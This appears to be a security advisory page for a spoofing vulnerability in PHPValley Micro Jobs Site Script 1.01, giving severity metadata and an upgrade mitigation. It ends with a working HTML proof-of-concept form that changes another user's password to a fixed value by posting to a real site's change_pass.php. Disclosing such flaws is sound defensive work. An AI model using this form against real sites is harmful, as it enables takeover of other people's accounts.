PHPValley Micro Jobs Site Script Spoofing Vulnerability

vendor:

Micro Jobs Site Script

by:

SecurityFocus

7,5

CVSS

HIGH

Spoofing

287

CWE

Product Name: Micro Jobs Site Script

Affected Version From: 1.01

Affected Version To: 1.01

Patch Exists: YES

Related CWE: N/A

CPE: a:phpvalley:micro_jobs_site_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

PHPValley Micro Jobs Site Script Spoofing Vulnerability

PHPValley Micro Jobs Site Script is prone to a vulnerability that allows attackers to spoof another user. Attackers can exploit this issue to spoof another user; other attacks are also possible. An attacker can craft a malicious form to change the password of a target user to a predefined value.

Mitigation:

Upgrade to the latest version of PHPValley Micro Jobs Site Script

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/59536/info

PHPValley Micro Jobs Site Script is prone to a vulnerability that allows attackers to spoof another user.

Attackers can exploit this issue to spoof another user; other attacks are also possible.

PHPValley Micro Jobs Site Script 1.01 is vulnerable; other versions may also be affected. 

<!-- be logged into your own account, edit info below: -->
<form method="post" action="http://webfiver.com/change_pass.php">
<input name="changepass" type="hidden" value="Update" />
Target Username: <input name="auser" type="text" />
Your Password:   <input name="cpass" type="password" />
 <input name="npass" type="hidden" value="jacked" />
 <input name="npassc" type="hidden" value="jacked" />
 <input type="submit" value="Jack" />
</form>